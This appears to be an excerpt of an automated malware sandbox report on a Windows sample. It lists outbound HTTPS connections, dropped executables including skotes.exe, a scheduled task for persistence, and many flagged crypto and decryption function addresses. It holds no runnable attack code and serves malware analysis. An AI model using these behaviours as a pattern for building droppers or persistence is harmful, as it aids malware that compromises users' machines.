Source: unknown Network traffic detected: HTTP traffic on port 51592 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51514 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62412
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62220 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51537
Source: unknown Network traffic detected: HTTP traffic on port 62302 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51538
Source: unknown Network traffic detected: HTTP traffic on port 51607 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51535
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51536
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51899
Source: unknown Network traffic detected: HTTP traffic on port 62182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51630 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62369 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51530
Source: unknown Network traffic detected: HTTP traffic on port 51525 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51618 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62231 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62304
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62305
Source: unknown Network traffic detected: HTTP traffic on port 62208 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62306
Source: unknown Network traffic detected: HTTP traffic on port 62313 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62307
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62428
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62308
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62309
Source: unknown Network traffic detected: HTTP traffic on port 62298 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62300
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62301
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62302
Source: unknown Network traffic detected: HTTP traffic on port 51536 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62303
Source: unknown Network traffic detected: HTTP traffic on port 62326 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62349 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62303 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62281
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62282
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62283
Source: unknown Network traffic detected: HTTP traffic on port 62269 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62284
Source: unknown Network traffic detected: HTTP traffic on port 62384 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62361 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62281 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62274
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62396
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62276
Source: unknown Network traffic detected: HTTP traffic on port 51577 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62277
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62278
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62279
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62290
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62293
Source: unknown Network traffic detected: HTTP traffic on port 51611 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62293 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62295
Source: unknown Network traffic detected: HTTP traffic on port 62190 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62212 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62315 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62285
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62286
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62288
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51599 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62182
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62183
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62184
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62185
Source: unknown Network traffic detected: HTTP traffic on port 51600 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62385 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51623 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62201 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62296
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62297
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62298
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62299
Source: unknown Network traffic detected: HTTP traffic on port 62373 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51518 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62337 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62190
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62191
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62192
Source: unknown Network traffic detected: HTTP traffic on port 51634 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62193
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62194
Source: unknown Network traffic detected: HTTP traffic on port 62396 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62195
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62196
Source: unknown Network traffic detected: HTTP traffic on port 62235 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62348 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62362 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51588 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62186
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62187
Source: unknown Network traffic detected: HTTP traffic on port 62189 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62189
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62360
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62240
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62361
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51584
Source: unknown Network traffic detected: HTTP traffic on port 62191 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51585
Source: unknown Network traffic detected: HTTP traffic on port 51899 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51588
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51589
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51586
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51587
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62238
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62359
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62239
Source: unknown Network traffic detected: HTTP traffic on port 62339 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51591
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51592
Source: unknown Network traffic detected: HTTP traffic on port 51621 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51590
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62230
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62351
Source: unknown Network traffic detected: HTTP traffic on port 51590 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62231
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62352
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62232
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62353
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62354
Source: unknown Network traffic detected: HTTP traffic on port 62222 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62355
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62235
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62356
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62357
Source: unknown Network traffic detected: HTTP traffic on port 62371 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62237
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62358
Source: unknown Network traffic detected: HTTP traffic on port 51632 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 62304 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51609 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62370
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62250
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62371
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62251
Source: unknown Network traffic detected: HTTP traffic on port 62268 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62372
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51593
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51594
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51599
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51597
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51544 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51598
Source: unknown Network traffic detected: HTTP traffic on port 62360 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62249
Source: unknown Network traffic detected: HTTP traffic on port 62279 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51517 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62362
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62363
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62364
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62365
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62366
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62367
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62247
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 62368
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:51580 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:62324 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:62396 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:62412 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:62428 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:51899 version: TLS 1.2

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: DocumentsCBAKJEHDBG.exe.0.dr Static PE information: section name:
Source: DocumentsCBAKJEHDBG.exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .rsrc
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: skotes.exe.22.dr Static PE information: section name:
Source: skotes.exe.22.dr Static PE information: section name: .idata
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB3B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CB3B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB3B8C0 rand_s,NtQueryVirtualMemory, 0_2_6CB3B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB3B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6CB3B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CADF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CADF280
Creates files inside the system directory
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe File created: C:\Windows\Tasks\skotes.job
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAD35A0 0_2_6CAD35A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB334A0 0_2_6CB334A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB3C4A0 0_2_6CB3C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAE6C80 0_2_6CAE6C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB16CF0 0_2_6CB16CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CADD4E0 0_2_6CADD4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAE64C0 0_2_6CAE64C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAFD4D0 0_2_6CAFD4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB4542B 0_2_6CB4542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB15C10 0_2_6CB15C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB22C10 0_2_6CB22C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB4AC00 0_2_6CB4AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB4545C 0_2_6CB4545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAE5440 0_2_6CAE5440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB385F0 0_2_6CB385F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB10DD0 0_2_6CB10DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB00512 0_2_6CB00512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAEFD00 0_2_6CAEFD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAFED10 0_2_6CAFED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB34EA0 0_2_6CB34EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB3E680 0_2_6CB3E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAF5E90 0_2_6CAF5E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB476E3 0_2_6CB476E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CADBEF0 0_2_6CADBEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAEFEF0 0_2_6CAEFEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB39E30 0_2_6CB39E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB17E10 0_2_6CB17E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB25600 0_2_6CB25600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB46E63 0_2_6CB46E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CADC670 0_2_6CADC670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB13E50 0_2_6CB13E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAF4640 0_2_6CAF4640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB22E4E 0_2_6CB22E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAF9E50 0_2_6CAF9E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB277A0 0_2_6CB277A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB06FF0 0_2_6CB06FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CADDFE0 0_2_6CADDFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB17710 0_2_6CB17710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAE9F00 0_2_6CAE9F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB060A0 0_2_6CB060A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAFC0E0 0_2_6CAFC0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB158E0 0_2_6CB158E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB450C7 0_2_6CB450C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB1B820 0_2_6CB1B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB24820 0_2_6CB24820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAE7810 0_2_6CAE7810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB1F070 0_2_6CB1F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAF8850 0_2_6CAF8850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAFD850 0_2_6CAFD850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB0D9B0 0_2_6CB0D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CADC9A0 0_2_6CADC9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB15190 0_2_6CB15190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB32990 0_2_6CB32990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB2B970 0_2_6CB2B970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB4B170 0_2_6CB4B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAED960 0_2_6CAED960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAFA940 0_2_6CAFA940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB42AB0 0_2_6CB42AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAD22A0 0_2_6CAD22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB04AA0 0_2_6CB04AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAECAB0 0_2_6CAECAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB4BA90 0_2_6CB4BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB1E2F0 0_2_6CB1E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAF1AF0 0_2_6CAF1AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB18AC0 0_2_6CB18AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB19A60 0_2_6CB19A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CADF380 0_2_6CADF380
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB453C8 0_2_6CB453C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB1D320 0_2_6CB1D320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAEC370 0_2_6CAEC370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAD5340 0_2_6CAD5340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBDECD0 0_2_6CBDECD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB7ECC0 0_2_6CB7ECC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC46C00 0_2_6CC46C00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB8AC60 0_2_6CB8AC60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC5AC30 0_2_6CC5AC30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB84DB0 0_2_6CB84DB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CD0CDC0 0_2_6CD0CDC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC16D90 0_2_6CC16D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CCAAD50 0_2_6CCAAD50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC4ED70 0_2_6CC4ED70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CD08D20 0_2_6CD08D20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC20EC0 0_2_6CC20EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC06E90 0_2_6CC06E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB8AEC0 0_2_6CB8AEC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC1EE70 0_2_6CC1EE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC60E20 0_2_6CC60E20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB8EFB0 0_2_6CB8EFB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC5EFF0 0_2_6CC5EFF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB80FE0 0_2_6CB80FE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CCC8FB0 0_2_6CCC8FB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB86F10 0_2_6CB86F10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC42F70 0_2_6CC42F70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CCC0F20 0_2_6CCC0F20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBEEF40 0_2_6CBEEF40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC868E0 0_2_6CC868E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC54840 0_2_6CC54840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBD0820 0_2_6CBD0820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC0A820 0_2_6CC0A820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC9C9E0 0_2_6CC9C9E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBB49F0 0_2_6CBB49F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC109A0 0_2_6CC109A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC3A9A0 0_2_6CC3A9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC409B0 0_2_6CC409B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBD6900 0_2_6CBD6900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBB8960 0_2_6CBB8960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBFEA80 0_2_6CBFEA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC2EA00 0_2_6CC2EA00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBFCA70 0_2_6CBFCA70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC38A30 0_2_6CC38A30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC86BE0 0_2_6CC86BE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC20BA0 0_2_6CC20BA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC1A4D0 0_2_6CC1A4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CCAA480 0_2_6CCAA480
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBC64D0 0_2_6CBC64D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBE4420 0_2_6CBE4420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB98460 0_2_6CB98460
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC0A430 0_2_6CC0A430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB745B0 0_2_6CB745B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC4A5E0 0_2_6CC4A5E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC0E5F0 0_2_6CC0E5F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC84540 0_2_6CC84540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CCC8550 0_2_6CCC8550
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC20570 0_2_6CC20570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBE2560 0_2_6CBE2560
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBD8540 0_2_6CBD8540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC1E6E0 0_2_6CC1E6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBDE6E0 0_2_6CBDE6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBA46D0 0_2_6CBA46D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBDC650 0_2_6CBDC650
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBAA7D0 0_2_6CBAA7D0
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Code function: 22_2_00E878BB 22_2_00E878BB
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Code function: 22_2_00E88860 22_2_00E88860
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Code function: 22_2_00E87049 22_2_00E87049
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Code function: 22_2_00E831A8 22_2_00E831A8
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Code function: 22_2_00F58101 22_2_00F58101
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Code function: 22_2_00E44B30 22_2_00E44B30
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Code function: 22_2_00E44DE0 22_2_00E44DE0
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Code function: 22_2_00E82D10 22_2_00E82D10
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Code function: 22_2_00E8779B 22_2_00E8779B
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Code function: 22_2_00E77F36 22_2_00E77F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00C778BB 23_2_00C778BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00C77049 23_2_00C77049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00C78860 23_2_00C78860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00C731A8 23_2_00C731A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00C34B30 23_2_00C34B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00C34DE0 23_2_00C34DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00C72D10 23_2_00C72D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00C7779B 23_2_00C7779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00C67F36 23_2_00C67F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 24_2_00C778BB 24_2_00C778BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 24_2_00C77049 24_2_00C77049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 24_2_00C78860 24_2_00C78860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 24_2_00C731A8 24_2_00C731A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 24_2_00C34B30 24_2_00C34B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 24_2_00C34DE0 24_2_00C34DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 24_2_00C72D10 24_2_00C72D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 24_2_00C7779B 24_2_00C7779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 24_2_00C67F36 24_2_00C67F36
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00C480C0 appears 260 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00C4DF80 appears 36 times
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Code function: String function: 00E580C0 appears 130 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CD009D0 appears 52 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CB0CBE8 appears 134 times
